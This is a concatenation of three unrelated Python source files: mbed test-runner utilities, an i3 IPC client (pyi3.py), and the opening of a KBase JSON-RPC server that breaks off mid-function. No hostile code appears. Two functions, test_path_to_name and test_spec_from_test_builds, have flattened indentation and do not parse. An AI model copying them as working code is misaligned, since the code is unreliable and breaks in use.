        result += pt.get_string()
        result += "\n\n"
    return result
def progress_bar(percent_progress, saturation=0):
    """ Creates a 50-character progress bar with an optional saturation mark.

        @param percent_progress progress in percent (0-100); each bar
               character represents two percent
        @param saturation if > 0, percent position at which a marker is
               inserted: '|' when the bar has reached it, '!' otherwise
        @return progress bar string
    """
    step = int(percent_progress / 2)    # Scale percent to bar width (0-50 chars)
    str_progress = '#' * step + '.' * int(50 - step)
    c = '!' if str_progress[38] == '.' else '|'
    if saturation > 0:
        # Bug fix: use explicit floor division; plain '/' relied on Python 2
        # semantics and yields a float under Python 3, breaking the slices.
        saturation = saturation // 2
        str_progress = str_progress[:saturation] + c + str_progress[saturation:]
    return str_progress
def singletest_in_cli_mode(single_test):
    """ Runs SingleTestRunner object in CLI (Command line interface) mode

        @param single_test configured SingleTestRunner instance
        @return returns success code (0 == success) for building and running tests
    """
    start = time()
    # Execute tests depending on options and filter applied
    test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext, build_report, build_properties = single_test.execute()
    elapsed_time = time() - start
    # Human readable summary
    if not single_test.opts_suppress_summary:
        # prints well-formed summary with results (SQL table like)
        print single_test.generate_test_summary(test_summary, shuffle_seed)
    if single_test.opts_test_x_toolchain_summary:
        # prints well-formed summary with results (SQL table like)
        # table shows text x toolchain test result matrix
        print single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
    print "Completed in %.2f sec"% (elapsed_time)
    print
    # Write summary of the builds
    print_report_exporter = ReportExporter(ResultExporterType.PRINT, package="build")
    status = print_report_exporter.report(build_report)
    # Store extra reports in files
    if single_test.opts_report_html_file_name:
        # Export results in form of HTML report to separate file
        report_exporter = ReportExporter(ResultExporterType.HTML)
        report_exporter.report_to_file(test_summary_ext, single_test.opts_report_html_file_name, test_suite_properties=test_suite_properties_ext)
    if single_test.opts_report_junit_file_name:
        # Export results in form of JUnit XML report to separate file
        report_exporter = ReportExporter(ResultExporterType.JUNIT)
        report_exporter.report_to_file(test_summary_ext, single_test.opts_report_junit_file_name, test_suite_properties=test_suite_properties_ext)
    if single_test.opts_report_text_file_name:
        # Export results in form of a text file
        report_exporter = ReportExporter(ResultExporterType.TEXT)
        report_exporter.report_to_file(test_summary_ext, single_test.opts_report_text_file_name, test_suite_properties=test_suite_properties_ext)
    if single_test.opts_report_build_file_name:
        # Export build results as html report to separate file
        report_exporter = ReportExporter(ResultExporterType.JUNIT, package="build")
        report_exporter.report_to_file(build_report, single_test.opts_report_build_file_name, test_suite_properties=build_properties)
    # Returns True if no build failures of the test projects or their dependencies
    return status
class TestLogger():
    """ Base class gathering test suite events; subclasses decide how the
        collected entries are rendered (screen, file, database, ...)
    """
    def __init__(self, store_log=True):
        """ Pass store_log=False to skip in-memory retention of entries
            (each entry is then only handled at the moment it is logged)
        """
        self.log = []
        self.log_to_file = False
        self.log_file_name = None
        self.store_log = store_log
        # Enumerations describing entry severity and file-open behaviour
        self.LogType = construct_enum(INFO='Info',
                                      WARN='Warning',
                                      NOTIF='Notification',
                                      ERROR='Error',
                                      EXCEPT='Exception')
        self.LogToFileAttr = construct_enum(CREATE=1,    # Create or overwrite existing log file
                                            APPEND=2)    # Append to existing log file

    def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
        """ Record one line of text and return the created log entry """
        log_entry = {
            'log_type': LogType,
            'log_timestamp': time(),
            'log_line': log_line,
            '_future': None,
        }
        # Keep the entry in memory only when retention is enabled
        if self.store_log:
            self.log.append(log_entry)
        return log_entry
class CLITestLogger(TestLogger):
    """ Logger used with CLI (Command line interface) test suite. Logs on screen and to file if needed
    """
    def __init__(self, store_log=True, file_name=None):
        """ @param store_log forwarded to TestLogger (keep entries in memory)
            @param file_name optional log file; each logged line is appended to it
        """
        # Bug fix: store_log was previously dropped, so the base class
        # always kept entries in memory regardless of the caller's choice.
        TestLogger.__init__(self, store_log=store_log)
        self.log_file_name = file_name
        #self.TIMESTAMP_FORMAT = '%y-%m-%d %H:%M:%S' # Full date and time
        self.TIMESTAMP_FORMAT = '%H:%M:%S' # Time only

    def log_print(self, log_entry, timestamp=True):
        """ Returns log entry formatted for screen output, optionally
            prefixed with a '[HH:MM:SS] ' timestamp
        """
        ts = log_entry['log_timestamp']
        timestamp_str = datetime.datetime.fromtimestamp(ts).strftime("[%s] "% self.TIMESTAMP_FORMAT) if timestamp else ''
        log_line_str = "%(log_type)s: %(log_line)s"% (log_entry)
        return timestamp_str + log_line_str

    def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
        """ Logs line, if log file output was specified log line will be appended
            at the end of log file
        """
        log_entry = TestLogger.log_line(self, LogType, log_line)
        log_line_str = self.log_print(log_entry, timestamp)
        if self.log_file_name is not None:
            try:
                with open(self.log_file_name, 'a') as f:
                    f.write(log_line_str + line_delim)
            except IOError:
                # Logging must never break the test run; drop the line silently.
                pass
        return log_line_str
def factory_db_logger(db_url):
    """ Factory for a database access object based on the db type encoded
        in the database connection string.

        @param db_url database connection string, e.g. 'mysql://user:pass@host/db'
        @return database access object, or None when db_url is missing or the
                database type is unsupported
    """
    if db_url is not None:
        from tools.test_mysql import MySQLDBAccess
        # Parse once and reuse the tuple (previously the string was parsed twice).
        connection_info = BaseDBAccess().parse_db_connection_string(db_url)
        if connection_info is not None:
            (db_type, username, password, host, db_name) = connection_info
            if db_type == 'mysql':
                return MySQLDBAccess()
    return None
def detect_database_verbose(db_url):
    """ uses verbose mode (prints) database detection sequence to check if database connection string is valid

        @param db_url database connection string to validate
    """
    result = BaseDBAccess().parse_db_connection_string(db_url)
    if result is not None:
        # Parsing passed
        (db_type, username, password, host, db_name) = result
        #print "DB type '%s', user name '%s', password '%s', host '%s', db name '%s'"% result
        # Let's try to connect
        db_ = factory_db_logger(db_url)
        if db_ is not None:
            print "Connecting to database '%s'..."% db_url,
            db_.connect(host, username, password, db_name)
            if db_.is_connected():
                print "ok"
                print "Detecting database..."
                print db_.detect_database(verbose=True)
                print "Disconnecting...",
                db_.disconnect()
                print "done"
        else:
            # No driver for this database type (only mysql is supported)
            print "Database type '%s' unknown"% db_type
    else:
        print "Parse error: '%s' - DB Url error"% (db_url)
def get_module_avail(module_name):
    """ Returns True if module_name has already been imported.

        @param module_name name of the module to look up
        @return True when the module is present in sys.modules
    """
    # Membership test directly on sys.modules; the previous '.keys()'
    # call materialised a list (on Python 2) for no benefit.
    return module_name in sys.modules
def get_autodetected_MUTS_list(platform_name_filter=None):
    """ Detects connected mbed devices via mbed-ls and returns them as a
        MUTs dictionary (delegates to get_autodetected_MUTS).

        @param platform_name_filter optional list of platform names to keep
    """
    oldError = None
    if os.name == 'nt':
        # Disable Windows error box temporarily
        oldError = ctypes.windll.kernel32.SetErrorMode(1) #note that SEM_FAILCRITICALERRORS = 1
    mbeds = mbed_lstools.create()
    detect_muts_list = mbeds.list_mbeds()
    if os.name == 'nt':
        # Restore the previous Windows error mode
        ctypes.windll.kernel32.SetErrorMode(oldError)
    return get_autodetected_MUTS(detect_muts_list, platform_name_filter=platform_name_filter)
def get_autodetected_MUTS(mbeds_list, platform_name_filter=None):
    """ Function detects all connected to host mbed-enabled devices and generates artificial MUTS file.
        If function fails to auto-detect devices it will return empty dictionary.

        if get_module_avail('mbed_lstools'):
            mbeds = mbed_lstools.create()
            mbeds_list = mbeds.list_mbeds()

        @param mbeds_list list of mbeds captured from mbed_lstools
        @param platform_name_filter You can filter 'platform_name' with list of filtered targets from 'platform_name_filter'
        @return dictionary in muts_all.json format: {index: mut_description}
    """
    result = {}   # Should be in muts_all.json format
    # Align mbeds_list from mbed_lstools to MUT file format (JSON dictionary with muts)
    # mbeds_list = [{'platform_name': 'NUCLEO_F302R8', 'mount_point': 'E:', 'target_id': '07050200623B61125D5EF72A', 'serial_port': u'COM34'}]
    index = 1
    for mut in mbeds_list:
        # Filter the MUTS if a filter is specified
        if platform_name_filter and not mut['platform_name'] in platform_name_filter:
            continue
        # For mcu_unique - we are assigning 'platform_name_unique' value from mbedls output (if its existing)
        # if not we are creating our own unique value (last few chars from platform's target_id).
        m = {'mcu': mut['platform_name'],
             'mcu_unique': mut['platform_name_unique'] if 'platform_name_unique' in mut else "%s[%s]" % (mut['platform_name'], mut['target_id'][-4:]),
             'port': mut['serial_port'],
             'disk': mut['mount_point'],
             'peripherals': []  # No peripheral detection
             }
        # Indices are generated sequentially, so no collision is possible;
        # the previous 'if index not in result' guard was dead code.
        result[index] = m
        index += 1
    return result
def get_autodetected_TEST_SPEC(mbeds_list,
                               use_default_toolchain=True,
                               use_supported_toolchains=False,
                               toolchain_filter=None,
                               platform_name_filter=None):
    """ Builds an artificial test_spec structure from a list of detected
        mbed-enabled devices; an empty 'targets' description is returned
        when nothing usable is detected.

        use_default_toolchain - if True add default toolchain to test_spec
        use_supported_toolchains - if True add all supported toolchains to test_spec
        toolchain_filter - if [...list of toolchains...] add from all toolchains only those in filter to test_spec
    """
    result = {'targets': {}}
    for mut in mbeds_list:
        mcu = mut['mcu']
        # Skip devices excluded by the platform filter
        if platform_name_filter is not None and mcu not in platform_name_filter:
            continue
        # Unknown targets cannot be mapped to any toolchain
        if mcu not in TARGET_MAP:
            continue
        target = TARGET_MAP[mcu]
        # Collect the toolchain pool for this target according to the flags
        toolchain_pool = []
        if use_default_toolchain:
            toolchain_pool.append(target.default_toolchain)
        if use_supported_toolchains:
            toolchain_pool += target.supported_toolchains
        if toolchain_filter is not None:
            all_toolchains = target.supported_toolchains + [target.default_toolchain]
            toolchain_pool += [tc for tc in toolchain_filter if tc in all_toolchains]
        # De-duplicate while keeping the original 'list(set(...))' semantics
        result['targets'][mcu] = list(set(toolchain_pool))
    return result
def get_default_test_options_parser():
    """ Get common test script options used by CLI, web services etc.

        @return configured argparse.ArgumentParser instance; options that
                depend on mbed_lstools (--auto, --tc, --oper) are only added
                when that module is already imported
    """
    parser = argparse.ArgumentParser()
    # Input specifications (test spec, MUTs spec, build parallelism)
    parser.add_argument('-i', '--tests',
                        dest='test_spec_filename',
                        metavar="FILE",
                        type=argparse_filestring_type,
                        help='Points to file with test specification')
    parser.add_argument('-M', '--MUTS',
                        dest='muts_spec_filename',
                        metavar="FILE",
                        type=argparse_filestring_type,
                        help='Points to file with MUTs specification (overwrites settings.py and private_settings.py)')
    parser.add_argument("-j", "--jobs",
                        dest='jobs',
                        metavar="NUMBER",
                        type=int,
                        help="Define number of compilation jobs. Default value is 1")
    if get_module_avail('mbed_lstools'):
        # Additional features available when mbed_lstools is installed on host and imported
        # mbed_lstools allow users to detect connected to host mbed-enabled devices
        parser.add_argument('--auto',
                            dest='auto_detect',
                            action="store_true",
                            help='Use mbed-ls module to detect all connected mbed devices')
        toolchain_list = list(TOOLCHAINS) + ["DEFAULT", "ALL"]
        parser.add_argument('--tc',
                            dest='toolchains_filter',
                            type=argparse_many(argparse_uppercase_type(toolchain_list, "toolchains")),
                            help="Toolchain filter for --auto argument. Use toolchains names separated by comma, 'default' or 'all' to select toolchains")
        test_scopes = ','.join(["'%s'" % n for n in get_available_oper_test_scopes()])
        parser.add_argument('--oper',
                            dest='operability_checks',
                            type=argparse_lowercase_type(get_available_oper_test_scopes(), "scopes"),
                            help='Perform interoperability tests between host and connected mbed devices. Available test scopes are: %s' % test_scopes)
    # Test selection / filtering options
    parser.add_argument('--clean',
                        dest='clean',
                        action="store_true",
                        help='Clean the build directory')
    parser.add_argument('-P', '--only-peripherals',
                        dest='test_only_peripheral',
                        default=False,
                        action="store_true",
                        help='Test only peripheral declared for MUT and skip common tests')
    parser.add_argument('-C', '--only-commons',
                        dest='test_only_common',
                        default=False,
                        action="store_true",
                        help='Test only board internals. Skip perpherials tests and perform common tests')
    parser.add_argument('-n', '--test-by-names',
                        dest='test_by_names',
                        type=argparse_many(str),
                        help='Runs only test enumerated it this switch. Use comma to separate test case names')
    parser.add_argument('-p', '--peripheral-by-names',
                        dest='peripheral_by_names',
                        type=argparse_many(str),
                        help='Forces discovery of particular peripherals. Use comma to separate peripheral names')
    # Flash / reset plugin selection (capabilities come from host_tests_plugins)
    copy_methods = host_tests_plugins.get_plugin_caps('CopyMethod')
    copy_methods_str = "Plugin support: " + ', '.join(copy_methods)
    parser.add_argument('-c', '--copy-method',
                        dest='copy_method',
                        type=argparse_uppercase_type(copy_methods, "flash method"),
                        help="Select binary copy (flash) method. Default is Python's shutil.copy() method. %s"% copy_methods_str)
    reset_methods = host_tests_plugins.get_plugin_caps('ResetMethod')
    reset_methods_str = "Plugin support: " + ', '.join(reset_methods)
    parser.add_argument('-r', '--reset-type',
                        dest='mut_reset_type',
                        default=None,
                        type=argparse_uppercase_type(reset_methods, "reset method"),
                        help='Extra reset method used to reset MUT by host test script. %s'% reset_methods_str)
    # Static analysis and reporting switches
    parser.add_argument('-g', '--goanna-for-tests',
                        dest='goanna_for_tests',
                        action="store_true",
                        help='Run Goanna static analyse tool for tests. (Project will be rebuilded)')
    parser.add_argument('-G', '--goanna-for-sdk',
                        dest='goanna_for_mbed_sdk',
                        action="store_true",
                        help='Run Goanna static analyse tool for mbed SDK (Project will be rebuilded)')
    parser.add_argument('-s', '--suppress-summary',
                        dest='suppress_summary',
                        default=False,
                        action="store_true",
                        help='Suppresses display of wellformatted table with test results')
    parser.add_argument('-t', '--test-summary',
                        dest='test_x_toolchain_summary',
                        default=False,
                        action="store_true",
                        help='Displays wellformatted table with test x toolchain test result per target')
    parser.add_argument('-A', '--test-automation-report',
                        dest='test_automation_report',
                        default=False,
                        action="store_true",
                        help='Prints information about all tests and exits')
    parser.add_argument('-R', '--test-case-report',
                        dest='test_case_report',
                        default=False,
                        action="store_true",
                        help='Prints information about all test cases and exits')
    parser.add_argument("-S", "--supported-toolchains",
                        action="store_true",
                        dest="supported_toolchains",
                        default=False,
                        help="Displays supported matrix of MCUs and toolchains")
    parser.add_argument("-O", "--only-build",
                        action="store_true",
                        dest="only_build_tests",
                        default=False,
                        help="Only build tests, skips actual test procedures (flashing etc.)")
    # Execution control (parallelism, loops, shuffling)
    parser.add_argument('--parallel',
                        dest='parallel_test_exec',
                        default=False,
                        action="store_true",
                        help='Experimental, you execute test runners for connected to your host MUTs in parallel (speeds up test result collection)')
    parser.add_argument('--config',
                        dest='verbose_test_configuration_only',
                        default=False,
                        action="store_true",
                        help='Displays full test specification and MUTs configration and exits')
    parser.add_argument('--loops',
                        dest='test_loops_list',
                        type=argparse_many(str),
                        help='Set no. of loops per test. Format: TEST_1=1,TEST_2=2,TEST_3=3')
    parser.add_argument('--global-loops',
                        dest='test_global_loops_value',
                        type=int,
                        help='Set global number of test loops per test. Default value is set 1')
    parser.add_argument('--consolidate-waterfall',
                        dest='consolidate_waterfall_test',
                        default=False,
                        action="store_true",
                        help='Used with --waterfall argument. Adds only one test to report reflecting outcome of waterfall test.')
    parser.add_argument('-W', '--waterfall',
                        dest='waterfall_test',
                        default=False,
                        action="store_true",
                        help='Used with --loops or --global-loops arguments. Tests until OK result occurs and assumes test passed')
    parser.add_argument('-N', '--firmware-name',
                        dest='firmware_global_name',
                        help='Set global name for all produced projects. Note, proper file extension will be added by buid scripts')
    parser.add_argument('-u', '--shuffle',
                        dest='shuffle_test_order',
                        default=False,
                        action="store_true",
                        help='Shuffles test execution order')
    parser.add_argument('--shuffle-seed',
                        dest='shuffle_test_seed',
                        default=None,
                        help='Shuffle seed (If you want to reproduce your shuffle order please use seed provided in test summary)')
    parser.add_argument('-f', '--filter',
                        dest='general_filter_regex',
                        type=argparse_many(str),
                        default=None,
                        help='For some commands you can use filter to filter out results')
    parser.add_argument('--inc-timeout',
                        dest='extend_test_timeout',
                        metavar="NUMBER",
                        type=int,
                        help='You can increase global timeout for each test by specifying additional test timeout in seconds')
    # Persistence and report outputs
    parser.add_argument('--db',
                        dest='db_url',
                        help='This specifies what database test suite uses to store its state. To pass DB connection info use database connection string. Example: \'mysql://username:password@127.0.0.1/db_name\'')
    parser.add_argument('-l', '--log',
                        dest='log_file_name',
                        help='Log events to external file (note not all console entries may be visible in log file)')
    parser.add_argument('--report-html',
                        dest='report_html_file_name',
                        help='You can log test suite results in form of HTML report')
    parser.add_argument('--report-junit',
                        dest='report_junit_file_name',
                        help='You can log test suite results in form of JUnit compliant XML report')
    parser.add_argument("--report-build",
                        dest="report_build_file_name",
                        help="Output the build results to a junit xml file")
    parser.add_argument("--report-text",
                        dest="report_text_file_name",
                        help="Output the build results to a text file")
    # Verbosity switches
    parser.add_argument('--verbose-skipped',
                        dest='verbose_skipped_tests',
                        default=False,
                        action="store_true",
                        help='Prints some extra information about skipped tests')
    parser.add_argument('-V', '--verbose-test-result',
                        dest='verbose_test_result_only',
                        default=False,
                        action="store_true",
                        help='Prints test serial output')
    parser.add_argument('-v', '--verbose',
                        dest='verbose',
                        default=False,
                        action="store_true",
                        help='Verbose mode (prints some extra information)')
    parser.add_argument('--version',
                        dest='version',
                        default=False,
                        action="store_true",
                        help='Prints script version and exits')
    return parser
def test_path_to_name(path):
"""Change all slashes in a path into hyphens
This creates a unique cross-platform test name based on the path
This can eventually be overriden by a to-be-determined meta-data mechanism"""
name_parts = []
head, tail = os.path.split(path)
while (tail and tail != "."):
name_parts.insert(0, tail)
head, tail = os.path.split(head)
return "-".join(name_parts).lower()
def find_tests(base_dir, target_name, toolchain_name, options=None):
    """ Finds all tests in a directory recursively

    base_dir: path to the directory to scan for tests (ex. 'path/to/project')
    target_name: name of the target to use for scanning (ex. 'K64F')
    toolchain_name: name of the toolchain to use for scanning (ex. 'GCC_ARM')
    options: Compile options to pass to the toolchain (ex. ['debug-info'])
    @return dictionary mapping test name -> test case directory
    """
    tests = {}
    # Prepare the toolchain
    toolchain = prepare_toolchain(base_dir, target_name, toolchain_name, options=options, silent=True)
    # Scan the directory for paths to probe for 'TESTS' folders
    base_resources = scan_resources(base_dir, toolchain)
    dirs = base_resources.inc_dirs
    for directory in dirs:
        subdirs = os.listdir(directory)
        # If the directory contains a subdirectory called 'TESTS', scan it for test cases
        if 'TESTS' in subdirs:
            walk_base_dir = join(directory, 'TESTS')
            test_resources = toolchain.scan_resources(walk_base_dir, base_path=base_dir)
            # Loop through all subdirectories
            for d in test_resources.inc_dirs:
                # If the test case folder is not called 'host_tests' and it is
                # located two folders down from the main 'TESTS' folder (ex. TESTS/testgroup/testcase)
                # then add it to the tests
                path_depth = get_path_depth(relpath(d, walk_base_dir))
                if path_depth == 2:
                    test_group_directory_path, test_case_directory = os.path.split(d)
                    test_group_directory = os.path.basename(test_group_directory_path)
                    # Check to make sure discovered folder is not in a host test directory
                    if test_case_directory != 'host_tests' and test_group_directory != 'host_tests':
                        test_name = test_path_to_name(d)
                        tests[test_name] = d
    return tests
def print_tests(tests, format="list", sort=True):
    """Given a dictionary of tests (as returned from "find_tests"), print them
    in the specified format

    @param tests dictionary mapping test name -> test path
    @param format either "list" (human readable) or "json"; anything else exits(1)
    @param sort unused; "list" output is always sorted by test name
    """
    if format == "list":
        for test_name in sorted(tests.keys()):
            test_path = tests[test_name]
            print "Test Case:"
            print "    Name: %s" % test_name
            print "    Path: %s" % test_path
    elif format == "json":
        print json.dumps(tests, indent=2)
    else:
        # Unsupported format is a fatal usage error
        print "Unknown format '%s'" % format
        sys.exit(1)
def norm_relative_path(path, start):
    """Return *path* relative to *start*, normalized and using forward
    slashes even on Windows (mimics os.path.relpath plus separator
    normalization)."""
    relative = os.path.relpath(os.path.normpath(path), start)
    return relative.replace("\\", "/")
def build_tests(tests, base_source_paths, build_path, target, toolchain_name,
                options=None, clean=False, notify=None, verbose=False, jobs=1,
                macros=None, silent=False, report=None, properties=None,
                continue_on_build_fail=False):
    """Given the data structure from 'find_tests' and the typical build parameters,
    build all the tests

    Returns a tuple of the build result (True or False) followed by the test
    build data structure"""
    execution_directory = "."
    base_path = norm_relative_path(build_path, execution_directory)
    # 'target' may be either a target name or a target object
    target_name = target if isinstance(target, str) else target.name
    test_build = {
        "platform": target_name,
        "toolchain": toolchain_name,
        "base_path": base_path,
        "baud_rate": 9600,
        "binary_type": "bootable",
        "tests": {}
    }
    result = True
    map_outputs_total = list()
    for test_name, test_path in tests.iteritems():
        test_build_path = os.path.join(build_path, test_path)
        src_path = base_source_paths + [test_path]
        bin_file = None
        test_case_folder_name = os.path.basename(test_path)
        try:
            bin_file = build_project(src_path, test_build_path, target, toolchain_name,
                                     options=options,
                                     jobs=jobs,
                                     clean=clean,
                                     macros=macros,
                                     name=test_case_folder_name,
                                     project_id=test_name,
                                     report=report,
                                     properties=properties,
                                     verbose=verbose)
        except Exception, e:
            # NotSupportedException is expected (target/toolchain mismatch)
            # and does not count as a failure
            if not isinstance(e, NotSupportedException):
                result = False
                if continue_on_build_fail:
                    continue
                else:
                    break
        # If a clean build was carried out last time, disable it for the next build.
        # Otherwise the previously built test will be deleted.
        if clean:
            clean = False
        # Normalize the path
        if bin_file:
            bin_file = norm_relative_path(bin_file, execution_directory)
            test_build['tests'][test_name] = {
                "binaries": [
                    {
                        "path": bin_file
                    }
                ]
            }
            print 'Image: %s'% bin_file
    test_builds = {}
    test_builds["%s-%s" % (target_name, toolchain_name)] = test_build
    return result, test_builds
def test_spec_from_test_builds(test_builds):
return {
"builds": test_builds
}
|
pyi3.py | #!/usr/bin/env python3
import threading
import json
import queue
import socket
import struct
import subprocess
__author__ = 'Adaephon'
# i3 IPC message types; a name's list position doubles as its numeric id.
msgTypes = [
    'command',
    'get_workspaces',
    'subscribe',
    'get_outputs',
    'get_tree',
    'get_marks',
    'get_bar_config',
    'get_version',
    'get_binding_modes',
]
# Reverse lookup: message name -> numeric message id.
msgTypesMap = {name: number for number, name in enumerate(msgTypes)}
# i3 IPC event types; a name's list position doubles as its numeric id.
eventTypes = [
    'workspace',
    'output',
    'mode',
    'window',
    'barconfig_update',
]
# Reverse lookup: event name -> numeric event id.
eventTypesMap = {name: number for number, name in enumerate(eventTypes)}
class Socket:
    """Low-level connection to the i3 IPC socket.

    Handles framing (magic string + payload length + message type header)
    and JSON decoding of replies and events.
    """
    magicString = b'i3-ipc'
    headerPacking = bytes('={}sLL'.format(len(magicString)), 'utf-8')
    headerLen = struct.calcsize(headerPacking)

    @staticmethod
    def get_path():
        """Ask the running i3 instance for its IPC socket path."""
        path = subprocess.check_output(['i3', '--get-socketpath']).rstrip()
        return path

    def __init__(self, socketPath=None):
        self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.socket.settimeout(1)
        self.socket.connect(socketPath or self.get_path())

    def _recv_exact(self, size):
        """Read exactly *size* bytes from the socket.

        Bug fix: socket.recv() may return fewer bytes than requested, so a
        single recv() call could silently truncate the header or a large
        message payload.
        """
        chunks = []
        remaining = size
        while remaining > 0:
            chunk = self.socket.recv(remaining)
            if not chunk:
                raise ConnectionError('i3 IPC socket closed mid-message')
            chunks.append(chunk)
            remaining -= len(chunk)
        return b''.join(chunks)

    def _send(self, msgType, msg=b''):
        message = (struct.pack(self.headerPacking, self.magicString,
                               len(msg), msgType) + msg)
        self.socket.sendall(message)

    def _receive(self):
        header = self._recv_exact(self.headerLen)
        _, msgSize, msgType = struct.unpack(self.headerPacking, header)
        data = self._recv_exact(msgSize)
        return msgType, data

    def receive(self):
        """Receive one message and return ('event'|'reply', name, parsed payload)."""
        type_, data = self._receive()
        # The high bit of the type field marks events (vs command replies).
        isEvent = type_ >> 31
        typeName = (eventTypes[type_ & 0x7f] if isEvent
                    else msgTypes[type_])
        # maybe use data.decode(errors=ignore) -> faulty jetbrains class name
        # see http://bugs.i3wm.org/report/ticket/1347
        parsedData = json.loads(data.decode())
        response = ('event' if isEvent else 'reply',
                    typeName,
                    parsedData)
        return response

    def __getattr__(self, attr):
        """
        Provides direct access to all i3 message types and commands

        :param attr: name of the message type or command
        :return: a function that sends the message and returns the response
        """
        # Testing beforehand instead of catching an exception may seem
        # un-Pythonic but it is overall faster if the exception would be
        # raised quite often.
        if attr in msgTypesMap:
            msgType = msgTypesMap[attr]
            prefix = b""
        else:
            msgType = msgTypesMap['command']
            prefix = attr.encode() + b" "

        def func(msg=b''):
            self._send(msgType, prefix + msg)
            return self.receive()
        return func
class I3Base:
    """Shared base holding the i3 IPC socket used by handler classes."""

    def __init__(self, i3socket=None):
        # A falsy/missing socket means "open our own connection".
        self.socket = Socket() if not i3socket else i3socket
class EventHandler(I3Base):
    """Reads i3 events from the IPC socket in one thread and dispatches
    them from a second worker thread via an internal queue."""

    def __init__(self, i3socket=None):
        super().__init__(i3socket)
        self.events = [0] * len(eventTypes)
        self._eventqueue = queue.Queue()
        self._subscript_confirmation = queue.Queue()
        self.isrunning = threading.Event()

    def run(self):
        """Start the reader and handler threads.

        Bug fix: the threads were created but never started, so no events
        were ever read or handled.
        """
        self.isrunning.set()
        handler = threading.Thread(target=self._handle_events)
        reader = threading.Thread(target=self._read_socket)
        handler.start()
        reader.start()

    def _read_socket(self):
        # Pump messages off the socket until stopped.
        while self.isrunning.is_set():
            dataType, name, payload = self.socket.receive()
            if dataType == 'event':
                self._eventqueue.put((name, payload))
            elif name == 'subscribe':
                # Bug fix: was misspelled 'subcribe', so every subscribe
                # confirmation raised UnexpectedDataError instead.
                self._subscript_confirmation.put(payload)
            else:
                raise UnexpectedDataError((dataType, name, payload))

    def _handle_events(self):
        while self.isrunning.is_set():
            type_, payload = self._eventqueue.get()
            if type_ == -1:
                # Sentinel used to unblock and stop the handler thread.
                break
            self._handle_event(type_, payload)

    def _handle_event(self, type_, payload):
        # Default handler only traces the event; subclasses override this.
        print(type_, payload)

    # TODO: something to pause handling (certain) events to avoid recursion
    def pause(self, events=None):
        pass
class Hook:
    """Planned binding of a callback to an (event, change) pair; the
    constructor currently discards its arguments (not yet implemented)."""
    def __init__(self, event, change=None, callback=None):
        pass
class UnexpectedDataError(Exception):
    """Raised when the IPC socket yields data that is neither an event
    nor an expected reply."""
    pass
class Item:
    """Lightweight wrapper exposing a mapping's keys as attributes."""

    def __init__(self, items):
        # Copy every entry of the mapping into the instance namespace so
        # values can be read as attributes (item.key).
        vars(self).update(items)
class WorkspaceHandler(I3Base):
    """Convenience accessors for i3 workspaces (work in progress)."""
    def __init__(self, i3socket=None):
        super().__init__(i3socket)

    @property
    def _workspaces(self):
        # get_workspaces() returns (kind, type name, payload); only the
        # payload (list of workspace dicts) is of interest here.
        _, _, wslist = self.socket.get_workspaces()
        # Wrap each workspace dict for attribute-style access.
        return map(lambda ws: Item(ws), wslist)

    def workspaces(self, visible=None, focused=None, urgent=None,
                   num=None):
        # TODO: filter workspaces by the given flags; not implemented yet.
        pass
|
kb_staging_exporterServer.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from kb_staging_exporter.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
    """Return the deployment config path from the environment, or None."""
    return environ.get(DEPLOY)
def get_service_name():
    """Return the configured service name from the environment, or None."""
    return environ.get(SERVICE)
def get_config():
    """Parse the deployment config file into a plain dict, or None if no
    config file is configured in the environment."""
    cfg_path = get_config_file()
    if not cfg_path:
        return None
    parser = ConfigParser()
    parser.read(cfg_path)
    section = get_service_name() or 'kb_staging_exporter'
    # Flatten this service's (name, value) pairs into a dict.
    return {name: value for name, value in parser.items(section)}
# Load the service configuration once at import time; it is shared by the
# impl object below, the Application, and getIPAddress.
config = get_config()
# Import deferred until after config is loaded because the impl constructor
# consumes it.
from kb_staging_exporter.kb_staging_exporterImpl import kb_staging_exporter  # noqa @IgnorePep8
impl_kb_staging_exporter = kb_staging_exporter(config)
class JSONObjectEncoder(json.JSONEncoder):
    """JSON encoder that additionally serializes sets, frozensets, and any
    object exposing a ``toJSONable()`` method."""

    def default(self, obj):
        # Sets of either flavour serialize as JSON arrays.
        if isinstance(obj, (set, frozenset)):
            return list(obj)
        # Objects can opt in to serialization via toJSONable().
        if hasattr(obj, 'toJSONable'):
            return obj.toJSONable()
        # Defer to the base class, which raises TypeError.
        return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
    """JSON-RPC service that threads a call context (ctx) through to every
    registered method as its implicit first argument, with custom error
    packaging that embeds server-side tracebacks.

    NOTE(review): this class relies on Python 2-only features
    (``e.message``, ``basestring``, ``dict.has_key``) and will not run
    unmodified on Python 3.
    """

    def call(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in a JSON
        string or None if there is none.

        Arguments:
        jsondata -- remote method call in jsonrpc format
        """
        result = self.call_py(ctx, jsondata)
        if result is not None:
            return json.dumps(result, cls=JSONObjectEncoder)
        return None

    def _call_method(self, ctx, request):
        """Calls given method with given params and returns it value."""
        method = self.method_data[request['method']]['method']
        params = request['params']
        result = None
        try:
            if isinstance(params, list):
                # Does it have enough arguments?
                # (the -1 accounts for ctx being passed implicitly)
                if len(params) < self._man_args(method) - 1:
                    raise InvalidParamsError('not enough arguments')
                # Does it have too many arguments?
                if(not self._vargs(method) and len(params) >
                        self._max_args(method) - 1):
                    raise InvalidParamsError('too many arguments')
                result = method(ctx, *params)
            elif isinstance(params, dict):
                # Do not accept keyword arguments if the jsonrpc version is
                # not >=1.1.
                if request['jsonrpc'] < 11:
                    raise KeywordError
                result = method(ctx, **params)
            else:  # No params
                result = method(ctx)
        except JSONRPCError:
            # Protocol-level errors propagate unchanged.
            raise
        except Exception as e:
